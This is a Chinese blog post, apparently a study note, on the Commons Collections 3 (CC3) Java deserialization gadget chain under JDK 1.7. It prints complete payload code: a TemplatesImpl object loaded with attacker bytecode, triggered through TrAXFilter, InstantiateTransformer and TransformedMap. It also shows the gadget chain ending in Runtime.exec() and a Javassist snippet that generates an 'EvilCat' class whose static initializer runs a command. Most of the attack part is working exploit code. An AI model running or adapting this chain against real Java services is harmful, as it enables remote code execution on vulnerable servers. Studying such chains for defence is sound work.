java--CommonsCollections3基础学习

最新推荐文章于 2023-07-13 23:22:52 发布
最新推荐文章于 2023-07-13 23:22:52 发布
阅读量1k 收藏
点赞数 4
分类专栏: 代码审计学习 文章标签: 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44769520/article/details/124883749
版权

唉,做事不细心,浪费好光阴啊!由于对java的了解甚少,于是我还是像以前那样随便使用的ysoserial和下载的commonscollections4.4进行漏洞利用,发现在jdk1.7时会提示Templates有问题,在jdk1.8还没有任何反应,然后通过不断的寻找,最后发现了原因,原来测试环境是:

  • JDK 1.7

  • Commons Collections 3.1

推荐使用maven搭建,引入依赖

<dependencies>
    <dependency>
        <groupId>commons-collections</groupId>
        <artifactId>commons-collections</artifactId>
        <version>3.1</version>
    </dependency>


    <dependency>
        <groupId>org.javassist</groupId>
        <artifactId>javassist</artifactId>
        <version>3.24.1-GA</version>
    </dependency>
</dependencies>

。。。。。。。

那么在CommonsCollections3的学习之前,我们已经学习了1和2,那么3也会很好理解了,先看一下利用payload:

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InstantiateTransformer;
import java.io.*;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import org.apache.commons.collections.map.TransformedMap;

import javax.xml.transform.Templates;

public class demo {
    public static void main(String[] args) throws Exception {
        FileInputStream inputFromFile = new FileInputStream("/Users/zyer/Downloads/untitled/out/production/untitled/Exp2.class");
        byte[] bs = new byte[inputFromFile.available()];
        inputFromFile.read(bs);

        TemplatesImpl obj = new TemplatesImpl();
        setFieldValue(obj, "_bytecodes", new byte[][]{bs});
        setFieldValue(obj, "_name", "TemplatesImpl");
        setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());

        ChainedTransformer chain = new ChainedTransformer(new Transformer[]{
                new ConstantTransformer(TrAXFilter.class),
                new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{obj})
        });
        Map innerMap = new HashMap();
        Map outerMap = TransformedMap.decorate(innerMap,null,chain);
        outerMap.put("1","1");

    }
    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }

}

在直接上别人写好的利用链

ObjectInputStream.readObject()
        AnnotationInvocationHandler.readObject()
            Map(Proxy).entrySet()
                AnnotationInvocationHandler.invoke()
                    LazyMap.get()
                        ChainedTransformer.transform()
                        ConstantTransformer.transform()
                        InstantiateTransformer.transform()
                        newInstance()
                            TrAXFilter#TrAXFilter()
                            TemplatesImpl.newTransformer()
                                     TemplatesImpl.getTransletInstance()
                                     TemplatesImpl.defineTransletClasses
                                     newInstance()
                                        Runtime.exec()

我们可以看到新的东西就是InstantiateTransformer和TrAXFilter

那么我们先对这俩东西分别进行学习:

1.InstantiateTransformer

我们直接进入这个Transformer的transform方法看一下功能

 发现他会判断input是不是class类型,是的话就使用反射获取其构造方法然后实例化一个对象并返回。

2.TrAXFilter

我们直接看一下它的构造方法

在 SAX API 中提供了一个过滤器接口 org.xml.sax.XMLFilter,XMLFilterImpl 是对它的缺省实现,使用过滤器进行应用程序开发时,只要继承 XMLFilterImpl,就可以方便的实现自己的功能。

com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter 是对 XMLFilterImpl 的实现,在其基础上扩展了 Templates/TransformerImpl/TransformerHandlerImpl 属性,

TrAXFilter 在实例化时接收 Templates 对象,并调用其 newTransformer 方法,这就可以触发我们的 TemplatesImpl 的攻击 payload 了。

可能是我之前学习的时候不太认真,我到这会有疑问了,Templates和TemplatesImpl有啥关系?

这个可以追溯到TemplatesImpl的定义(关于继承或者接口的学习之后在回来重新看一下)

我们也可以测试一下

 那么这样我们就可以认为上述思路成了(TrAXFilter 在实例化时接收 Templates 对象,并调用其 newTransformer 方法,这就可以触发我们的 TemplatesImpl 的攻击 payload 了。)

那么对于payload代码的理解:构建一个TemplatesImpl对象,然后使用TrAXFilter作为出发点,这其中会生成一个TemplatesImpl对象并使用newTransformer这个方法,然后InstantiateTransformer使用反射将其实例化,因为之前通过反射的方法已经构造了执行命令的TemplatesImpl对象,然后加入到一个map中,这里使用的TransformedMap的方法,于是使用put方法的时候就会触发了。

因为TransformedMap使用的局限性,我们仍然可以使用LazyMap,然后参考commonscollections6使用TiedMapEntry和HashMap以及HashSet可以实现jdk7和8的所有版本的利用。

在这需要学习的新知识就是maven中引入依赖的javassist,javassist 用来动态修改类。

Javaassist 就是一个用来处理 Java 字节码的类库,其主要优点在于简单、便捷。用户不需要了解虚拟机指令,就可以直接使用Java编码的形式,并且可以动态改变类的结构,或者动态生成类。

Javassist中最为重要的是ClassPool,CtClass ,CtMethod 以及 CtField这几个类。

  • ClassPool:一个基于HashMap实现的CtClass对象容器,其中键是类名称,值是表示该类的CtClass对象。默认的ClassPool使用与底层JVM相同的类路径,因此在某些情况下,可能需要向ClassPool添加类路径或类字节。

  • CtClass:表示一个类,这些 CtClass 对象可以从ClassPool获得。

  • CtMethods:表示类中的方法。

  • CtFields :表示类中的字段。

    Javassit官方文档中给出的代码示例如下

首先获取 ClassPool 的实例,ClassPool 主要用来修改字节码,并且在 ClassPool 中存储着 CtClass 对象,它能够按需创建出 CtClass 对象并提供给后续处理流程使用,当需要进行类修改操作的时候,可以通过 ClassPool 实例的.get()方法,获取CtClass对象。如在上述代码中就是从 pool 中利用 get 方法获取到了test.Rectangle对象,然后将获取到的 CtClass 对象赋值给cc变量。

需要注意的是,从 ClassPool 中获取的 CtClass 对象,是可以被修改的。如在上述代码中,可以看到,原先的父类,由test.Rectangle被改成了test.Point。这种更改可以通过调用CtClass().writeFile()将其持久化到文件中。

中文文档:Javassist中文技术文档 - 程序诗人 - 博客园 

 测试代码

//      使用Javassit新建一个含有static的类
        ClassPool pool = ClassPool.getDefault();
        pool.insertClassPath(new ClassClassPath(AbstractTranslet.class));
        CtClass cc = pool.makeClass("Cat");
        String cmd = "java.lang.Runtime.getRuntime().exec(\"open -a Calculator\");";
        cc.makeClassInitializer().insertBefore(cmd);
        String randomClassName = "EvilCat" + System.nanoTime();
        cc.setName(randomClassName);
        cc.setSuperclass(pool.get(AbstractTranslet.class.getName()));
        cc.writeFile();

然后我们会生成一个class文件

 

zyer1
关注
  • 4
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Caused by: java.lang.ClassNotFoundException: org.apache.commons.collections.Transformer异常
08-18
主要介绍了Caused by: java.lang.ClassNotFoundException: org.objectweb.asm.Type异常,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习
com.springsource.org.apache.commons.collections-2.1.1.jar
03-03
jar包,官方版本,自测可用
org.apache.commons.collections-3.2.1.jar.zip
06-05
org.apache.commons.collections-3.2.1.jar
com.springsource.org.apache.commons.collections-3.2.1.jar
03-03
jar包,官方版本,自测可用
Maven 项目中常用的工具包
qq_27242695的博客
05-13 517
Maven 项目中常用的工具包 后续不断更新 1 时间相关 1.1 依赖包 <dependency> <groupId>joda-time</groupId> <artifactId>joda-time</artifactId> <version>2.9.4</version> &
Provides transitive vulnerable dependency maven:commons-collections:commons-collections:3.2.2
Smileyan's blog
03-16 7655
maven依赖警告,vulnerable 脆弱依赖
CommonsCollections1
qq_63928796的博客
03-16 1175
是Apache软件基金会的项目,曾经隶属于Jakarta项目。Commons的目的是提供可重用的、解决各种实际的通用问题且开源的Java代码。Proper(是一些已发布的项目)、Sandbox(是一些正在开发的项目)和Dormant(是一些刚启动或者已经停止维护的项目)。包为Java标准的提供了相当好的补充。在此基础上对其常用的数据结构操作进行了很好的封装、抽象和补充。让我们在开发应用程序的过程中,既保证了性能,同时也能大大简化代码。
Commons-Collections简介
li295214001的专栏
05-14 6985
如果你不熟悉Jakarta Commons话,那么很有可能你已经重新发明了好几个轮子。在你编写更多的普通的框架或工具之前,体验一下Commons吧。它将会大大地节约你的时间。太多的人自己写一个,其实是与Commons Lang中的StringUtils重复的StringUtils类,或者,开发者不知道从Commons Collections中重新创建工具,哪怕commons-collections
maven常用pom依赖总结
u012581453的专栏
02-08 4301
aliyum <!-- https://mvnrepository.com/artifact/com.aliyun/aliyun-java-sdk-core --> <dependency> <groupId>com.aliyun</groupId> <artifactId>aliyun-java-sdk-core</artifactId> <version>4.5.4</version>
java代码审计之CC1链(一)
st3pby的博客
02-20 3745
InvokerTransformerCC1链的漏洞点位于InvokerTransformer.class中反射加载参数可控那么只需要调用到这个点,就可以触发漏洞,可以参考ysoserial中的CC1利用ysoserial中的CC1链,是使用LazyMap构造的,LazyMap构造的整条攻击路径为。
java-基础要点总结-学习java必看.docx
12-14
java-基础要点总结-学习java必看.docx
java-fundamental:学习Java基础
02-16
java-fundamental:学习Java基础
java-spring基础学习资源一
最新发布
03-03
spring学习用户自身学习测试使用主要是测试案例用于debugspring源码使用
Java-Java Maven基础教程
11-14
Java Maven基础教程 资源为视频教程资源 希望对你的 Java 学习有所帮助。
《Java-Web应用开发基础》综合练习3.docx
12-19
《Java-Web应用开发基础》综合练习3.docx
POI 报错: org.apache.commons.collections4.ListValuedMap
laterstage的博客
07-13 1640
org.apache.commons.collections4.ListValuedMap
Commons Collections利用链
Townmacro的博客
04-04 770
Commons Collections反序列化利用链
Java猿社区—Apache Commons Collections—CollectionUtils工具类详解
竹林幽深
08-06 3629
欢迎关注作者博客简书传送门 文章目录 前言 代码示例 前言 论阅读源码的重要性,后期会对各大开源框架相关源码做详细阅读,并熟悉使用,本次主要对Apache Commons Collections中CollectionUtils类进行示例分析,如有错误,请多指教。 通过apache-commons包中的org.apache.commons.collections.CollectionUtils集合操作工具类 对集合间进行合并union、交叉int..
Java反序列化基础
公众号shadow sock7
02-13 243
参考: https://xz.aliyun.com/t/4711 commons-collections-3.1反序列化漏洞Demo 依赖commons-collections-3.1 下载地址: https://repo1.maven.org/maven2/commons-collections/commons-collections/3.1/commons-collections-3.1.ja...
jmu-java-03面向对象基础-object
06-28
Object 是 Java 中的根类,是所有类的父类。所有的 Java 类(除了八个基本类型)都继承于 Object 类,因此可以调用 Object 类的方法。例如:toString()、equals()、hashCode() 等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值